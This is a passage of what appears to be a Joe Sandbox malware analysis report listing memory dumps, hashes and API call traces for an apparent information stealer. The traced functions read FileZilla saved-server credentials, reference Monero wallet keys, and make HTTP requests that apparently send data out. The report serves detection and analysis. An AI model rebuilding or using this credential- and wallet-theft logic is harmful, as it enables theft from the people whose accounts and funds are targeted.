                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 45d4bc0c536b62ab929d679821c7df158857a7592faae704713279463b9d2ff1
                              • Instruction ID: 4ebac6be0ecea4115c725726c6cd446eacba26aa207db16d4b4cf980afe592c8
                              • Opcode Fuzzy Hash: 45d4bc0c536b62ab929d679821c7df158857a7592faae704713279463b9d2ff1
                              • Instruction Fuzzy Hash: 83313AF350C6009FD3056E28DC85BFEB7E8DF88720F660A2DEAC6E7340D535598196A6
                              Function 00CA26D9 Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2299817339347d101605c63358f01b319696207caad08239fb3c724ffd95abf
                              • Instruction ID: 79948babad198fdb6e6b17ab73e6d369ddc46571695a751056566bb3a44342d0
                              • Opcode Fuzzy Hash: a2299817339347d101605c63358f01b319696207caad08239fb3c724ffd95abf
                              • Instruction Fuzzy Hash: D73159B3B086145FE358AD79EC54377B797EBD0320F29863ED98187388FD7558068181
                              Function 00E2BDD6 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 868f190debea4ce6f0f44bcf4b9b8696c26163b82fef49deeb13fb719e682882
                              • Instruction ID: 3c18c07e42b8b845b68df81ab1714e61901f51e6ae538b65fd6d83e119cb92f5
                              • Opcode Fuzzy Hash: 868f190debea4ce6f0f44bcf4b9b8696c26163b82fef49deeb13fb719e682882
                              • Instruction Fuzzy Hash: 092148B290C220AFE705AE68C84666EF7E5FF98350F06492CEAD5C3710D6359850CB97
                              Function 009F9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 009F0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009F8E0B
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009E99EC
                                • Part of subcall function 009E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009E9A11
                                • Part of subcall function 009E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009E9A31
                                • Part of subcall function 009E99C0: ReadFile.KERNEL32(000000FF,?,00000000,009E148F,00000000), ref: 009E9A5A
                                • Part of subcall function 009E99C0: LocalFree.KERNEL32(009E148F), ref: 009E9A90
                                • Part of subcall function 009E99C0: CloseHandle.KERNEL32(000000FF), ref: 009E9A9A
                                • Part of subcall function 009F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009F8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00A00DBA,00A00DB7,00A00DB6,00A00DB3), ref: 009F0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 009F0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 009F03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 009F0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009F0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009F0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 009F0571
                              • lstrcat.KERNEL32(?,url: ), ref: 009F0580
                              • lstrcat.KERNEL32(?,00000000), ref: 009F0593
                              • lstrcat.KERNEL32(?,00A01678), ref: 009F05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 009F05B5
                              • lstrcat.KERNEL32(?,00A0167C), ref: 009F05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 009F05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 009F05E6
                              • lstrcat.KERNEL32(?,00A01688), ref: 009F05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 009F0604
                              • lstrcat.KERNEL32(?,00000000), ref: 009F0617
                              • lstrcat.KERNEL32(?,00A01698), ref: 009F0626
                              • lstrcat.KERNEL32(?,00A0169C), ref: 009F0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A00DB2), ref: 009F068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 8c1c11ed28424cef6b62ee8eeb913aab034e2bcfb16471270e133520adc95b6e
                              • Instruction ID: fdd6a830b35696d2c1a80167d56ef788df9d414d8ce7cea527242b0f687dd7a3
                              • Opcode Fuzzy Hash: 8c1c11ed28424cef6b62ee8eeb913aab034e2bcfb16471270e133520adc95b6e
                              • Instruction Fuzzy Hash: A3D12CB191010CABCB14EBE4DD96FFE7378BF94700F508518F606A6095EE74AA0ACB65
                              Function 009E5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009E59F8
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013BE3E0,00000000,?,013B9A38,00000000,?,00A01A1C), ref: 009E5E71
                              • lstrlen.KERNEL32(00000000), ref: 009E5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 009E5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E5E9A
                              • lstrlen.KERNEL32(00000000), ref: 009E5EAF
                              • lstrlen.KERNEL32(00000000), ref: 009E5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009E5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 009E5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009E5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 009E5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FBD
                              • HttpOpenRequestA.WININET(00000000,013BE290,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E5BF8
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • InternetCloseHandle.WININET(00000000), ref: 009E5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 0f46c5893197f806bff48d89dab8f3eebebfa4dee14d0bc630a9a1916042c01d
                              • Instruction ID: e12dd694ffc457da7a560779a38aa5a8aabe613758819d94febaa7720ba06aa6
                              • Opcode Fuzzy Hash: 0f46c5893197f806bff48d89dab8f3eebebfa4dee14d0bc630a9a1916042c01d
                              • Instruction Fuzzy Hash: 0012DEB182011CABDB15EBA0DC95FEEB378BF54740F5045A9F20A62091EF706B4ACF65
                              Function 009ECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009F8B60: GetSystemTime.KERNEL32(00A00E1A,013B9A98,00A005AE,?,?,009E13F9,?,0000001A,00A00E1A,00000000,?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009F8B86
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009ECF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009ED0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009ED0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED208
                              • lstrcat.KERNEL32(?,00A01478), ref: 009ED217
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED22A
                              • lstrcat.KERNEL32(?,00A0147C), ref: 009ED239
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED24C
                              • lstrcat.KERNEL32(?,00A01480), ref: 009ED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED26E
                              • lstrcat.KERNEL32(?,00A01484), ref: 009ED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED290
                              • lstrcat.KERNEL32(?,00A01488), ref: 009ED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED2B2
                              • lstrcat.KERNEL32(?,00A0148C), ref: 009ED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 009ED2D4
                              • lstrcat.KERNEL32(?,00A01490), ref: 009ED2E3
                                • Part of subcall function 009FA820: lstrlen.KERNEL32(009E4F05,?,?,009E4F05,00A00DDE), ref: 009FA82B
                                • Part of subcall function 009FA820: lstrcpy.KERNEL32(00A00DDE,00000000), ref: 009FA885
                              • lstrlen.KERNEL32(?), ref: 009ED32A
                              • lstrlen.KERNEL32(?), ref: 009ED339
                                • Part of subcall function 009FAA70: StrCmpCA.SHLWAPI(013B8800,009EA7A7,?,009EA7A7,013B8800), ref: 009FAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 009ED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: db3675a4af7afd5946c4f1ab52e5c6a999cc609830a9d3f98d2fc055fe75b000
                              • Instruction ID: 2ab8a2ef2545bc5625a9a347815a86a6161e1e46952d5cca662f1a41b3524856
                              • Opcode Fuzzy Hash: db3675a4af7afd5946c4f1ab52e5c6a999cc609830a9d3f98d2fc055fe75b000
                              • Instruction Fuzzy Hash: 42E11EB191010CABCB14EBA0DD96FFE7378BF54301F104558F60AA64A1DF75AE0ACB66
                              Function 009EC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013BC958,00000000,?,00A0144C,00000000,?,?), ref: 009ECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 009ECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 009ECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 009ECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 009ECAD9
                              • StrStrA.SHLWAPI(?,013BCA18,00A00B52), ref: 009ECAF7
                              • StrStrA.SHLWAPI(00000000,013BCAD8), ref: 009ECB1E
                              • StrStrA.SHLWAPI(?,013BD338,00000000,?,00A01458,00000000,?,00000000,00000000,?,013B8820,00000000,?,00A01454,00000000,?), ref: 009ECCA2
                              • StrStrA.SHLWAPI(00000000,013BD238), ref: 009ECCB9
                                • Part of subcall function 009EC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 009EC871
                                • Part of subcall function 009EC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 009EC87C
                              • StrStrA.SHLWAPI(?,013BD238,00000000,?,00A0145C,00000000,?,00000000,013B87F0), ref: 009ECD5A
                              • StrStrA.SHLWAPI(00000000,013B8B60), ref: 009ECD71
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B46), ref: 009EC943
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B47), ref: 009EC957
                                • Part of subcall function 009EC820: lstrcat.KERNEL32(?,00A00B4E), ref: 009EC978
                              • lstrlen.KERNEL32(00000000), ref: 009ECE44
                              • CloseHandle.KERNEL32(00000000), ref: 009ECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
